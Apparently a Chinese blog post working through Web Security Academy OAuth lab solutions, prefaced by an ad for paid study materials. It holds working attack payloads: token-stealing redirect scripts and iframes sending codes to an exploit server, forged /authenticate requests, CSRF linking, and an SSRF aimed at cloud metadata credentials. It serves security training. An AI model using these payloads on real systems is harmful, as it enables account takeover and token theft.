先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新大数据全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注大数据)
正文
- 在攻击机上构造恶意连接,引诱目标用户点击,发起请求,完成攻击
<script>
if (!document.location.hash) {
window.location = 'https://YOUR-LAB-AUTH-SERVER.web-security-academy.net/auth?client\_id=YOUR-LAB-CLIENT-ID&redirect\_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.web-security-academy.net/exploit/&response\_type=token&nonce=399721827&scope=openid%20profile%20email'
} else {
window.location = '/?'+document.location.hash.substr(1)
}
</script>
例题4
除了上述所属,还可以利用其他途径窃取token
- 危险js脚本处理
- XSS漏洞
- HTML模板注入
例题5
6. 有缺陷的数据范围(scope)验证
范围升级:授权码授权
假设攻击者的恶意客户端应用最初使用OpenID电子邮件作用域请求访问用户的电子邮件地址。在用户批准请求后,恶意客户端应用程序会收到授权码。当攻击者控制其客户端应用程序时,可以向包含附加配置文件范围的代码/令牌交换请求添加另一个范围参数:
POST /token
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8&scope=openid%20 email%20profile
如果OAuth服务没有验证作用域是否与初始请求一致,则会根据攻击者新申请的scope返回access_token
{
"access\_token": "z0y9x8w7v6u5",
"token\_type": "Bearer",
"expires\_in": 3600,
"scope": "openid email profile",
…
}
范围升级:隐式授权类型
用户利用前文的各种攻击手段,直接获取了access_token,直接在scope添加新的数据范围,OAuth服务应该根据生成令牌时值来验证此作用域值,但实际是只要调整后的权限不超过以前授予此客户端应用程序的访问级别,攻击者就有可能访问其他数据,而无需用户的进一步批准。
未验证注册:用户身份验证授权
客户端应用程序通常默认从OAuth服务拿到的用户账户信息是可信任而未加验证。
可尝试直接在OAuth服务注册新的账户信息,但是内容填写的是目前用户的内容,由于OAuth对内容验证不够全面,导致攻击者可以使用新注册账户通过OAuth服务登录客户端应用。由于此账户信息与目标用户的账户信息基本一致,客户端默认为目标用户登录,导致攻击者直接登录上了目标账户。
7. 使用OpenID Connect扩展OAuth的身份认证
- OpenID Connect产生的原因
OAuth最初设计场景,只用于授权,即为客户端应用授权对应资源的访问。随后大量应用使用授权服务,实现对用户账户资源的访问,通过获取用户账户凭证,来作为客户端应用的身份验证。
这种原始的方式,需要针对不同OAuth提供者,实施定制化的配置,来实现所谓的“身份验证”。因此,OpenID Connect应运而出,作为OAuth协议的扩展,建立基于OAuth实现之上的专用身份和身份验证层,提供相对标准易用的身份验证功能。
- OpenID Connect原理
整体来说,使用时仅有两点变化
- scope: openid xxx
- profile
- address
- phone
- response_type: id_token
- 返回使用JSON Web 签名(JWS)的JSON Web token(JWT)
- 无需获取访问令牌,单独请求用户数据,在用户对自己进行身份验证后,立即将包含数据的ID令牌发回响应。
- 传输的数据的完整性基于JWT加密签名。用于签名验证的密钥是通过OAuth相同的网络通道(通常在/.well-now/jwks.json上公开)传输的
- response_type 可设置多值
response_type=id_token token
response_type=id_token code
- OAuth服务动态注册漏洞
一般查看公开路径能获取到OAuth用户注册路径
标准注册数据包
POST /openid/register HTTP/1.1 (根据配置设定,调整地址)
Content-Type: application/json
Accept: application/json
Host: oauth-authorization-server.com
Authorization: Bearer ab12cd34ef56gh89
{
"application_type": "web",
"redirect_uris": [
"https://client-app.com/callback",
"https://client-app.com/callback2"
],
"client_name": "My Application",
"logo_uri": "https://client-app.com/logo.png",
"token_endpoint_auth_method": "client_secret_basic",
"jwks_uri": "https://client-app.com/my_public_keys.jwks",
"userinfo_encrypted_response_alg": "RSA1_5",
"userinfo_encrypted_response_enc": "A128CBC-HS256",
…
}
如Oauth服务没有验证Authorization,则攻击者可以自行构造注册数据包完成注册。同时数据包中大量uri(redirect_uris\logo_uri\jwks_uri等),可尝试SSRF或任意跳转传递导致的信息泄露的可能
例题6
三、漏洞实例
1. 通过OAuth隐式流绕过身份验证(Authentication bypass via OAuth implicit flow)
- 目标
在没有目标用户密码的情况下,登陆carlos账户
网站允许使用社交媒体账户登陆,测试账号wiener:peter 目标账户邮箱carlos@carlos-montoya.net
- 解题详情
抓包分析隐式授权身份验证流程
交互1:点击账户,显示社交媒体账号登陆
GET /social-login HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept:
响应包中,出现OAuth请求路径
<meta http-equiv=refresh content='3;url=https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth?client\_id=fvssuu3sg44ljzyn6r0ep&redirect\_uri=https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback&response\_type=token&nonce=-487256685&scope=openid%20profile%20email'>
<p>We are now redirecting you to login with social media...</p>
根据路径参数,可知道response_type为`token`隐式授权类型。综上应为使用OAuth的身份验证能力。
交互2:客户端向该url发起身份验证请求
GET /auth?client_id=fvssuu3sg44ljzyn6r0ep&redirect_uri=https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback&response_type=token&nonce=-487256685&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
响应中包含内部交互的路径,并set-cookie
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; path=/interaction/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:32:37 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; path=/auth/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:32:37 GMT; samesite=lax; secure; httponly
Location: /interaction/2gEEwfwhCnj8cOwJ0DhAD
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 00:22:37 GMT
Connection: close
Content-Length: 99
Redirecting to <a href="/interaction/2gEEwfwhCnj8cOwJ0DhAD">/interaction/2gEEwfwhCnj8cOwJ0DhAD</a>.
交互3 提供账户密码后并包含获得的cookie后,向内部交互路径发起POST请求
POST /interaction/2gEEwfwhCnj8cOwJ0DhAD/login HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD
username=wiener&password=peter
验证通过后,响应包中包含新的认证url
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth/2gEEwfwhCnj8cOwJ0DhAD
Date: Wed, 25 May 2022 00:23:50 GMT
Connection: close
Content-Length: 0
交互4:向该URL发起GET请求,获取用户授权确认页
GET /auth/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD
响应并没有直接返回页面,而是新增设置了一个cookie,和新的内部交互路径。
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; path=/interaction/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:33:51 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; path=/auth/2gEEwfwhCnj8cOwJ0DhAD; expires=Wed, 25 May 2022 00:33:51 GMT; samesite=lax; secure; httponly
Set-Cookie: _session=Ah7U6Zc6D4aC2zCQHjjOu; path=/; expires=Wed, 08 Jun 2022 00:23:51 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu; path=/; expires=Wed, 08 Jun 2022 00:23:51 GMT; secure; httponly
Location: /interaction/2gEEwfwhCnj8cOwJ0DhAD
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 00:23:51 GMT
Connection: close
Content-Length: 99
Redirecting to <a href="/interaction/2gEEwfwhCnj8cOwJ0DhAD">/interaction/2gEEwfwhCnj8cOwJ0DhAD</a>
交互5:同时携带新、旧两个cookie向新URL发起GET请求
GET /interaction/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu
总算响应用户授权确认页了,要的是profile和Email
<strong>WeLikeToBlog</strong> is requesting access to:</li>
<ul>
<li>Profile</li>
<li>Email</li>
交互6:用户主动点击确认。
POST /interaction/2gEEwfwhCnj8cOwJ0DhAD/confirm HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu
响应下一步请求的URL
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/auth/2gEEwfwhCnj8cOwJ0DhAD
交互7:继续向之前请求过的页面发起GET请求,只是本次携带新旧两个cookie
GET /auth/2gEEwfwhCnj8cOwJ0DhAD HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
Cookie: _interaction_resume=2gEEwfwhCnj8cOwJ0DhAD; _session=Ah7U6Zc6D4aC2zCQHjjOu; _session.legacy=Ah7U6Zc6D4aC2zCQHjjOu
本次响应就给力多了,提供的下一步访问URL中包含了全部OAuth的参数,尤其是出现了梦寐以求的`access_token`
交互8:这回终于OAuth主动一回,主动向客户端应用发起GET请求
GET /oauth-callback HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt
看到响应包,总算明白了,是主动向客户端应用要解析参数的js代码,双方根据ajax方式,后续返回给客户端数据。约定:
- 客户端主动发起的ajax请求,OAuth返回数据。
- OAuth向客户端应用发送OAuth身份认证数据,用于客户端完成用户自登陆
- 跳转至首页
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 734
<script>
const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
const token = urlSearchParams.get('access_token');
fetch('https://oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net/me', { (客户端主动发起的ajax请求)
method: 'GET',
headers: {
'Authorization': 'Bearer ' + token,
'Content-Type': 'application/json'
}
})
.then(r => r.json())
.then(j =>
fetch('/authenticate', {(OAuth向客户端应用返回的数据内容和格式)
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({
email: j.email,
username: j.sub,
token: token
})
}).then(r => document.location = '/')) (跳转至首页)
</script>
交互9 客户端主动发起的ajax请求,OAuth返回数据。
GET /me HTTP/1.1
Host: oauth-ac731f891f9364c2c00a6ca5026300bb.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/
Authorization: Bearer yErTtKxjHZi8pEh0-Gm9QKyO2RJcZuGGqyetLKS3wGX
Content-Type: application/json
Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
响应数据
HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Access-Control-Expose-Headers: WWW-Authenticate
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Date: Wed, 25 May 2022 00:26:29 GMT
Connection: close
Content-Length: 88
{"sub":"wiener","name":"Peter Wiener","email":"wiener@hotdog.com","email_verified":true}
交互10 最后一步,OAuth向客户端应用发送OAuth身份认证数据,用于客户端完成用户自登陆
POST /authenticate HTTP/1.1
Host: aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Cookie: session=EqvfiG2Ch3BSyI3m8HbvdAVTBoDv2lAt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://aced1fcd1f73644dc0d56c3100eb002b.web-security-academy.net
Content-Length: 103
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"email":"wiener@hotdog.com","username":"wiener","token":"yErTtKxjHZi8pEh0-Gm9QKyO2RJcZuGGqyetLKS3wGX"}
最后客户端应用跳转至首页(此时用户已经登陆了哦~)
以上就是数据包的完整分析,搞清楚流程后,我们就要来简单利用这里面的漏洞了
- 本题测试非常简单,根据上面的流程,选择最后一步交互10,将email和username替换为目标用的信息,若系统流程没有验证,则客户端应用会以为收到的认证信息为carlos的随后完成自登陆。
POST /authenticate HTTP/1.1
Host: ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net
Cookie: session=h8MMYmtjjanwfWANDP1wjYBUNVBbb1M3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://ac6a1fce1edb9238c08751db007a00bf.web-security-academy.net
Content-Length: 111
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"email":"carlos@carlos-montoya.net","username":"carlos","token":"rwCpJDSVYKbWNyaarAOUUrWFeEsLsGivV6zg25qik6m"
成功登陆
2. 强制OAuth配置文件链接 (Forced OAuth profile linking)
- 目标
使用攻击者的社交媒体账号登陆客户端应用中admin的账户,并利用期权限删除carlos账户。
攻击者可使用的账户:
客户端应用账户 wiener:peter
社交媒体账户:peter.wiener:hotdog
- 解题详情
- 抓包熟悉登陆流程后,发现没有参数
state,可尝试CSRF攻击。浏览数据包发现突破到点GET /oauth-linking?code=[...] - 已攻击者应用账户登陆,点击绑定社交媒体账户,拦截此数据包,存储code,并丢弃该包,保证code新鲜未被使用。
- 抓包熟悉登陆流程后,发现没有参数
GET /oauth-linking?code=24uFvh01DqV6Sog-ZSiYAaPznbaDYE9QaJ2O66vJeXT HTTP/1.1
Host: ac001f981f3bc17fc0d623e8006b0093.web-security-academy.net
Cookie: session=ASfvnXuHTLWHIXPTaRYWKyrSUsAXULLB
- 构造攻击荷载,发送给目标用户(admin)。只要点击,就会自动完成社交媒体账户绑定。相当于目标admin账户绑定的是攻击者的社交媒体账户。
<iframe src="https://ac001f981f3bc17fc0d623e8006b0093.web-security-academy.net/oauth-linking?code=24uFvh01DqV6Sog-ZSiYAaPznbaDYE9QaJ2O66vJeXT "></iframe>
- 客户端应用退出登陆,直接使用攻击者社交媒体账号登陆,会发现实际登陆上的是admin账户,使用admin管理权限删除carlos账号即可。
3. 通过redirect_uri劫持OAuth帐户(OAuth account hijacking via redirect_uri)
- 目标
攻击者窃取用户admin的授权码,并借此登陆账户,使用管理员权限删除carlos账户
攻击者可使用的客户端应用账户 wiener:peter
- 解题详情
抓包分析授权码授权方式流程
交互1:点击登录,客户端应用首先向OAuth服务器发送请求。
GET /auth?client_id=up6pjbyzpz48izvajspcc&redirect_uri=https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
响应包提供资源所有者登录OAuth账户的url
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; path=/interaction/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:17 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; path=/auth/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:17 GMT; samesite=lax; secure; httponly
Location: /interaction/B3ArOcTi85E97Xwrgpmc_
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 13:17:17 GMT
Connection: close
Content-Length: 99
Redirecting to <a href="/interaction/B3ArOcTi85E97Xwrgpmc_">/interaction/B3ArOcTi85E97Xwrgpmc_</a>.
交互2-1:客户端主动跳转至OAuth登录界面
GET /interaction/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
响应包
<form autocomplete="off" action="/interaction/B3ArOcTi85E97Xwrgpmc_/login" class="login-form" method="post">
<input required type="text" name="username" placeholder="Enter a username or email" autofocus="on">
<input required type="password" name="password" placeholder="and password" >
<button type="submit" class="login login-submit">Sign-in</button>
</form>
交互2-2: 用户输入账号密码登陆OAuth,用于完成后续的用户确认
POST /interaction/B3ArOcTi85E97Xwrgpmc_/login HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Referer: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/interaction/B3ArOcTi85E97Xwrgpmc_
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
username=wiener&password=peter
响应含下一步跳转url
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/auth/B3ArOcTi85E97Xwrgpmc_
Date: Wed, 25 May 2022 13:17:30 GMT
Connection: close
Content-Length: 0
交互2-3 增加一个session,并含下一步跳转url
GET /auth/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_ing
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; path=/interaction/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:31 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; path=/auth/B3ArOcTi85E97Xwrgpmc_; expires=Wed, 25 May 2022 13:27:31 GMT; samesite=lax; secure; httponly
Set-Cookie: _session=x0eVTPB_m7JKuiQCFXeyH; path=/; expires=Wed, 08 Jun 2022 13:17:31 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=x0eVTPB_m7JKuiQCFXeyH; path=/; expires=Wed, 08 Jun 2022 13:17:31 GMT; secure; httponly
Location: /interaction/B3ArOcTi85E97Xwrgpmc_
Content-Type: text/html; charset=utf-8
Date: Wed, 25 May 2022 13:17:31 GMT
Connection: close
Content-Length: 99
Redirecting to <a href="/interaction/B3ArOcTi85E97Xwrgpmc_">/interaction/B3ArOcTi85E97Xwrgpmc_</a>.
交互2-4:展示授权信息详细页
GET /interaction/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH
<strong>WeLikeToBlog</strong> is requesting access to:</li>
<ul>
<li>Profile</li>
<li>Email</li>
<form autocomplete="off" action="/interaction/B3ArOcTi85E97Xwrgpmc_/confirm" method="post">
<button autofocus type="submit" class="login login-submit">Continue</button>
</form>
交互2-5:用户确认授权
POST /interaction/B3ArOcTi85E97Xwrgpmc_/confirm HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net/auth/B3ArOcTi85E97Xwrgpmc_
Date: Wed, 25 May 2022 13:17:38 GMT
Connection: close
Content-Length: 0
交互2-6:根据上一步响应,跳转之前访问过的路径,只是这回带了两个session
GET /auth/B3ArOcTi85E97Xwrgpmc_ HTTP/1.1
Host: oauth-ac1a1fb71eb448fcc0806fcf028800aa.web-security-academy.net
Cookie: _interaction_resume=B3ArOcTi85E97Xwrgpmc_; _session=x0eVTPB_m7JKuiQCFXeyH; _session.legacy=x0eVTPB_m7JKuiQCFXeyH
响应中包含授权码
Redirecting to <a href="https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu">https://ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net/oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu</a>
交互3:OAuth服务器将授权码(code)发送给客户端
GET /oauth-callback?code=TTr3b7FBzmVHh4-GejLf9H07DP8MYpn1a_jz9uH3CIu HTTP/1.1
Host: ac161f371efa484fc0cd6f6500bf009a.web-security-academy.net
Cookie: session=3pNj65CoXY2qnsvZCynoRGaV6lU1RVb0
交互4:使用授权码申请访问令牌
突然发现数据包中没有了。是的根据文章开头介绍的授权码授权方式,从第4步开始使用专用安全通道后台传递数据,所以无法再拦截分析包了。
以上就是完整的授权码授权方式的分析。掌握了上面的流程,其实在分析这道题利用redirec_uri实现窃取code值的目的发放很明确了。
- 下面我们来解题了,原理就是修改交互1中的url参数
redirect_uri值为攻击机,发送给目标用户,这样交互3的数据包就会发到攻击机上,使攻击者获得code.
<iframe src="https://oauth-ac441fc71e308b78c0260c0902c20096.web-security-academy.net/auth?client\_id=fwkhrpwp8z0gwo7chxrmy&redirect\_uri=https://exploit-acec1f181e298b2bc0bd0c150122004d.web-security-academy.net&response\_type=code&scope=openid%20profile%20email"></iframe>
查看访问日志果然找到访问记录
"GET /?code=Q4Tg5-rB-_-zu0MKq6cPcMtTUeRysPemcldGkorFi9o HTTP/1.1" 200......
- 攻击者获得后,再在浏览器中发起交互3的URL访问构,完成后续的流程。
https://ac531fb41ec08b3cc0810c79002c001a.web-security-academy.net/oauth-callback?code=Q4Tg5-rB-_-zu0MKq6cPcMtTUeRysPemcldGkorFi9o
成功登陆,后续不再赘述
4. 通过开放重定向窃取OAuth访问令牌(Stealing OAuth access tokens via an open redirect)
- 目标
找到客户端应用的一个开放重定向漏洞,并利用此漏洞获取admin的访问令牌,获取其API KEY提交。
- 解题思路
- 首先找到客户端应用存在的访问重定向漏洞
GET /post/next?path=/post?postId=6 HTTP/1.1
Host: ac2b1f881e04cc62c048795500be00cf.web-security-academy.net
Cookie: session=Rv9IbR4Pq6TofZJQyhDSGWcs8svcf58v
- 确认OAuth的请求参数
redirect_uri可以路径穿越或截断
GET /auth?client_id=yodhmqw5cibuz9vdzcomt&redirect_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response_type=token&nonce=1378893845&scope=openid%20profile%20email HTTP/1.1
HTTP/1.1 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Set-Cookie: _interaction=dskLB4pHVVWJ7PnC_Ux8S; path=/interaction/dskLB4pHVVWJ7PnC_Ux8S; expires=Thu, 26 May 2022 00:57:38 GMT; samesite=lax; secure; httponly
Set-Cookie: _interaction_resume=dskLB4pHVVWJ7PnC_Ux8S; path=/auth/dskLB4pHVVWJ7PnC_Ux8S; expires=Thu, 26 May 2022 00:57:38 GMT; samesite=lax; secure; httponly
Location: /interaction/dskLB4pHVVWJ7PnC_Ux8S
Content-Type: text/html; charset=utf-8
Date: Thu, 26 May 2022 00:47:38 GMT
Connection: close
Content-Length: 99
Redirecting to <a href="/interaction/dskLB4pHVVWJ7PnC\_Ux8S">/interaction/dskLB4pHVVWJ7PnC_Ux8S</a>
- 重新构造请求,将
redirect_uri路径,路径穿越至存在重定向漏洞的页面,且参数为攻击机url
https://oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net/auth?client_id=yodhmqw5cibuz9vdzcomt&redirect_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response_type=token&nonce=1378893845&scope=openid%20profile%20email
浏览器访问该路径,查看攻击机有相关log
/?access_token=w9h6KFc7fIuvtqzf3bNZEQOhTnISa1XoTl8TOQA80F6&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email 拿到access_token攻击可行。
以上测试可行,可以开始正式攻击了。
- 在攻击机中构造js代码,发送给目标用户,引诱其点击
<script>
if (!document.location.hash) {
window.location = 'https://oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net/auth?client\_id=yodhmqw5cibuz9vdzcomt&redirect\_uri=https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-ac811f7f1eafcc5ac0c77950017b0084.web-security-academy.net/exploit&response\_type=token&nonce=1378893845&scope=openid%20profile%20email'
} else {
window.location = '/?'+document.location.hash.substr(1)
}
</script>
收到关键信息
/?access_token=92sK4CuiUCtdk9VvkVR7HmQeh_JklJA2NN1Nod35Pu-&expires_in=3600&token_type=Bearer
- 找到最终
/me这个数据包,替换里面的session
GET /me HTTP/1.1
Host: oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/
Authorization: Bearer 92sK4CuiUCtdk9VvkVR7HmQeh_JklJA2NN1Nod35Pu-
Content-Type: application/json
Origin: https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
获取admin账户信息
{"sub":"administrator","apikey":"7ro4jbKbsgvgSX7hFm30Gs7jJTY9MJQB","name":"Administrator","email":"administrator@normal-user.net","email\_verified":true}
5. 通过代理页面窃取OAuth访问令牌 (Stealing OAuth access tokens via a proxy page)
- 目标
找到客户端应用的一个开放重定向漏洞,并利用此漏洞获取admin的访问令牌,获取其API KEY提交。
测试账号wiener:peter
- 解题思路
暂略
6.通过OpenID客户端动态注册OAuth服务,结合SSRF获取敏感信息(SSRF via OpenID dynamic client registration)
- 目标
使用SSRF攻击,获取http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/中保存的secret access key
测试账号wiener:peter
- 解题思路
- 测试默认公开路径,查找注册OAuth服务地址,
https://OAuth路径/.well-known/openid-configuration
